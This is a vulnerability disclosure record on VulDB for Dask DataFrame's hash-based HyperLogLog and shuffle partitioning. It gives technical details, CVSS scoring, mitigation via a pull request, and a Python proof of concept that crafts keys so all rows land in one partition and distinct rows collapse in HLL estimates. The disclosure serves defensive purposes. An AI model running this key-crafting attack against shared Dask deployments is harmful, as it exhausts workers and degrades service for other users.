जमा करें #831411: dask 2026.3.0 Algorithmic Complexity / Hash Collision / Denial of Serviceजानकारी

शीर्षकdask 2026.3.0 Algorithmic Complexity / Hash Collision / Denial of Service
विवरण## Affected Component `dask.dataframe` ## Affected Files / Functions - `dask/dataframe/hyperloglog.py` - `compute_hll_array` - `compute_first_bit` - `estimate_count` - `dask/dataframe/shuffle.py` - `partitioning_index` - `dask/dataframe/backends.py` - `hash_object_pandas` - `dask/dataframe/multi.py` - `_split_partition` - hash-based join partitioning paths ## Affected Version Confirmed on Dask `main` before PR #12401 and in release tag `2026.3.0`. Potentially affects earlier versions using the same `pd.util.hash_pandas_object` based HyperLogLog and shuffle routing code paths. ## Vulnerability Type Algorithmic Complexity / Hash Collision / Denial of Service ## Suggested CWE - CWE-400: Uncontrolled Resource Consumption - CWE-328: Use of Weak Hash - CWE-682: Incorrect Calculation ## Title Dask `hash_pandas_object` collisions affect HLL accuracy and shuffle routing ## Summary Dask DataFrame uses `pd.util.hash_pandas_object` in HyperLogLog-based approximate cardinality estimation and hash-based shuffle/join partition routing. The hash is deterministic and not collision-resistant. In the HyperLogLog path, Dask currently truncates pandas 64-bit row hashes to `uint32`, increasing avoidable pre-estimation collisions and causing `nunique_approx()` to undercount crafted distinct rows. In shuffle and join routing, attacker-controlled string/object keys can be selected to land in the same partition bucket after modulo partitioning, causing partition skew and possible availability degradation. ## Technical Details `compute_hll_array` calls: ```python hashes = hash_pandas_object(obj, index=False) hashes = hashes.astype(np.uint32) ``` This truncates the 64-bit pandas hash output before the HLL register calculation. Shuffle routing uses logic equivalent to: ```python hash_object_dispatch(df, index=False) % npartitions ``` Because `hash_pandas_object` is deterministic and unkeyed by default, an attacker who controls input keys can preselect many distinct keys that route to the same target partition. ## Impact - Incorrect approximate uniqueness estimates in `nunique_approx()` - Partition hotspotting during shuffle/join workloads - Memory amplification on one partition/worker - CPU saturation and long shuffle tails - Worker failure or service degradation in adversarial shared environments ## Attack Vector Remote or local, depending on deployment. The issue is exploitable when an attacker can influence data processed by a Dask DataFrame workflow, especially keys used in shuffle or join operations. ## Attack Complexity Low, if the attacker can test or infer the partitioning behavior. ## Privileges Required Low or none, depending on whether the attacker needs access to submit datasets or jobs to the application using Dask. ## User Interaction None. ## Confidentiality Impact None. ## Integrity Impact Low. HLL estimates can be made inaccurate; shuffle/join correctness is generally preserved because final comparisons still use real keys. ## Availability Impact High in adversarial workloads due to bucket hotspotting and worker/resource exhaustion. ## Suggested CVSS v3.1 `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H` ## Suggested Severity High for availability in adversarial multi-tenant or user-input-driven Dask deployments. Medium for correctness/accuracy of approximate cardinality estimation. ## Proof of Concept ```python import pandas as pd from dask.dataframe.hyperloglog import compute_hll_array, estimate_count from dask.dataframe.shuffle import partitioning_index def collect_keys_for_bucket(npartitions, target_bucket, count): keys = [] i = 0 while len(keys) < count: key = f"attack_{i}" frame = pd.DataFrame({"key": [key]}) bucket = int(partitioning_index(frame[["key"]], npartitions).iloc[0]) if bucket == target_bucket: keys.append(key) i += 1 return keys rows = pd.DataFrame({"A": [1604090909467468979, 1], "B": [4, 3]}) row_hashes = pd.util.hash_pandas_object(rows, index=False) state = compute_hll_array(rows, b=10) print("row hashes:", row_hashes.tolist()) print("exact unique rows:", len(rows.drop_duplicates())) print("HLL estimate:", float(estimate_count(state, b=10))) npartitions = 16 target_bucket = 0 crafted_keys = collect_keys_for_bucket(npartitions, target_bucket, 64) attack_df = pd.DataFrame( { "key": crafted_keys * 64, "payload": range(len(crafted_keys) * 64), } ) counts = pd.Series(partitioning_index(attack_df[["key"]], npartitions)).value_counts() print("target bucket ratio:", counts.get(target_bucket, 0) / len(attack_df)) ``` ## Expected Result Distinct rows should not be collapsed before HLL estimation, and attacker-selected keys should not be trivially concentrated into one partition bucket in adversarial environments. ## Actual Result Distinct rows can share the same pre-HLL row hash and produce an HLL estimate close to 1 for 2 distinct rows. Distinct crafted keys can be selected so all rows route to the same partition bucket. ## Solution / Mitigation PR #12401 proposes: - Preserve full `uint64` pandas hashes in HyperLogLog instead of truncating to `uint32` - Add `dataframe.shuffle.hash-key` configuration for pandas-backed string/object hashing - Pass the configured hash key through `hash_object_pandas` - Add focused regression tests ## References - Issue: https://github.com/dask/dask/issues/12403 - Pull Request: https://github.com/dask/dask/pull/12401 - Original superseded PR: https://github.com/dask/dask/pull/12336 - Related upstream CI issue: https://github.com/dask/dask/issues/12337 - VulDB Submission Policy: https://vuldb.com/kb/submission ## Disclosure Status Public issue and pull request are open on GitHub.
स्रोत⚠️ https://github.com/dask/dask/issues/12403
उपयोगकर्ता
 Dem0 (UID 82596)
सबमिशन16/05/2026 06:07 AM (19 दिन पहले)
संयम02/06/2026 07:46 PM (18 days later)
स्थितिस्वीकृत
VulDB प्रविष्टि368018 [dask तक 3.0 HLL hyperloglog.py nunique_approx सेवा अस्वीकार]
अंक20

Do you know our Splunk app?

Download it now for free!